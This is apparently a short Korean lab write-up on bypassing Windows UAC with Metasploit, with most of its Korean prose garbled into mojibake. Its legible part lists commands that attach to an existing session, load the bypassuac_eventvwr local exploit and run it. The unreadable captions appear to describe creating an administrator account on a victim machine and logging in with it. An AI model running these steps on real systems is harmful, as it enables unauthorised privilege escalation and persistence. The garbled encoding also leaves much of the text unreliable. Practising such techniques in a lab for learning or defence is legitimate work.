์ผ๋‹จ ํ•˜๊ณ  ๋ณด๋Š” ์‚ฌ๋žŒ

๋‚˜์ค‘๋ณด๋‹จ ์ง€๊ธˆ์— ์ง‘์ค‘ํ•˜๋˜, ์ง€๊ธˆ๋ณด๋‹จ ๋‚˜์ค‘์— ์™„๋ฒฝํ•ด์ง€์ž๐Ÿ’ช๐Ÿป

๐Ÿง Linux ์•Œ๊ณ  ์“ฐ์ž

[metasploit] UAC ์šฐํšŒ ๊ถŒํ•œ ์ƒ์Šน ์‹œ๋„ _๊ธฐ๋ณธ ์‹ค์Šต

JanginTech 2024. 10. 16. 14:13

C2 ์„œ๋ฒ„์™€์˜ ์„ธ์…˜ ์—ฐ๊ฒฐ

 

์ƒ์„ฑ๋œ ์„ธ์…˜ ํ™•์ธ

sessions -i < sessions id>

 

use exploit/windows/local/bypassuac_eventvwr

set SESSION < sessions id>

exploit

์ ‘์†ํ•˜์—ฌ ๋ชจ๋“ˆ์„ ํ†ตํ•ด ์šฐํšŒ ์‹œ๋„

 

์–ด๋“œ๋ฏผ ๊ถŒํ•œ์˜ ์‚ฌ์šฉ์ž ๊ณ„์ • ์ƒ์„ฑ ์‹œ๋„

 

๋กœ์ปฌ ๊ทธ๋ฃน ๊ตฌ์„ฑ์›์ด *Administrators์ž„์„ ํ™•์ธ

 

 

์‹ค์ œ ํ”ผํ•ด์ž ์„œ๋ฒ„์—์„œ ์ƒˆ ๊ณ„์ •์ด ์ƒ๊ฒผ๊ณ  ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณต๋œ ๊ฒƒ์„ ํ™•์ธํ–ˆ์Œ